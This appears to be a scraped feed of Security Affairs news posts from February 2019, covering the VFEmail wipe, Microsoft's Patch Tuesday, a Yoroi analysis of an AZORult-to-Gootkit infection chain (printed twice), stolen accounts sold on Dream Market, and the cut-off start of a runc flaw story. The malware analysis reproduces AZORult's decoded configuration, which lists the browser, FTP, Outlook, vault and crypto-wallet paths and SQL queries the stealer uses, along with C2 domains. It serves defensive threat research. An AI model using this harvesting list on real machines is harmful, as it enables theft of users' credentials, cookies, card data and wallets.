VFEmail staff recommends that users do not connect their own email clients because the entire content of their accounts was erased by the hacker.

Backups of the servers located in the Netherlands were not affected and were used to restore the service.

The incident could suggest a wrong cybersecurity posture of the company that that was not able to prevent the intrusion and protect the backups.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post Hacker deleted all data from VFEmail Servers, including backups appeared first on Security Affairs.

Microsoft Patch Tuesday updates for February 2019 fixes IE Zero-Day

Microsoft released Patch Tuesday updates for February 2019 that address 77 flaws, including an Internet Explorer issue that has been exploited in attacks.

Microsoft released Patch Tuesday updates for February 2019 that address 77 flaws, 20 critical vulnerabilities, 54 important and 3 moderate in severity. One of the issue fixed by the tech giant is a zero-day vulnerability in Internet Explorer discovered by Google that has been exploited in attacks.

This zero-day, tracked as CVE-2019-0676, is an information disclosure flaw that tied the way Internet Explorer handles objects in memory.

An attacker can exploit the flaw by tricking the victims into visiting a malicious website using a vulnerable version of Internet Explorer. The flaw could be exploited by attackers to test for the presence of files on the targeted device’s disk.

“An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.” reads the security advisory.

“An attacker who successfully exploited this vulnerability could test for the presence of files on disk. For an attack to be successful, an attacker must persuade a user to open a malicious website. The security update addresses the vulnerability by changing the way Internet Explorer handles objects in memory.”

The vulnerability affects Internet Explorer 11, it was reported by Clement Lecigne from Google’s Threat Analysis Group

Microsoft Patch Tuesday

Microsoft’s Patch Tuesday updates for February 2019 also addressed several flaws whose details were publicly disclosed before a patch was made available.
The tech giant fixed flaws in Adobe Flash Player, Internet Explorer, Edge, Windows, MS Office, and Office Services and Web Apps, ChakraCore, .NET Framework, Exchange Server, Visual Studio, Azure IoT SDK, Dynamics, Team Foundation Server, and Visual Studio Code.

The list of patched issues includes two critical remote code execution vulnerabilities in SharePoint (CVE-2019-0594 and CVE-2019-0604) and a flaw in Windows DHCP Servers (CVE-2019-0626). The exploitation of these flaws could allow attackers to run arbitrary code and take control of the server.

Pierluigi Paganini

(SecurityAffairs – Kunbus, hacking)

The post Microsoft Patch Tuesday updates for February 2019 fixes IE Zero-Day appeared first on Security Affairs.

Security Affairs: Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat. 

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding=”base64″>
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type=”QString”>
  207. <password type=”QString”>
  208. </password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 – The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.



Security Affairs

Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat. 

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding=”base64″>
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type=”QString”>
  207. <password type=”QString”>
  208. </password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 – The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.

620 million accounts stolen from 16 hacked websites available for sale on the dark web

620 million accounts stolen from 16 hacked websites (Dubsmash, Armor Games, 500px, Whitepages, ShareThis) available for sale on the dark web

The Register revealed in exclusive that some 617 million online account details stolen from 16 hacked websites are available for sale on the dark web.

The advertising for the sale of the huge trove of data was published in the popular Dream Market black marketplace, data are available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites are known to have been hacked (i.e. MyHeritage, MyFitnessPal) for some of them it is the first time that the security community was informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legit. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

Most of the data included in the dump consist of account holder names, email addresses, and hashed passwords (in some cases password are hashed with the MD5 algorithm that makes it easy for hackers to decrypt).

Journalists pointed out that depending on the specific website there are other information in the archives, including location, personal details, and social media authentication tokens. The data doesn’t include financial information.

The information could be used by threat actors to target users of hacked websites and conduct several malicious activities.

“All of the databases are right now being touted separately by one hacker, who says he or she typically exploited security vulnerabilities within web apps to gain remote-code execution and then extract user account data.” states the post published by The Register. “The records were swiped mostly during 2018, we’re told, and went on sale this week.”

The journalists confirmed that they received the information that the Dubsmash data has been purchased by at least one individual.

The seller seems to be located outside of the US, at least in one case he attempted to blackmail the owner of the website asking money to avoid the sale of data.

dark web

The seller told The Register that he stolen roughly a billion accounts from servers to date since he started hacking in 2012.

“I don’t think I am deeply evil,” the seller told The Register. “I need the money. I need the leaks to be disclosed.”

“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 620 million accounts stolen from 16 hacked websites available for sale on the dark web appeared first on Security Affairs.

Docker runc flaw opens the door to a ‘Doomsday scenario’

Security experts found a serious flaw tracked CVE-2019-5736 affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.

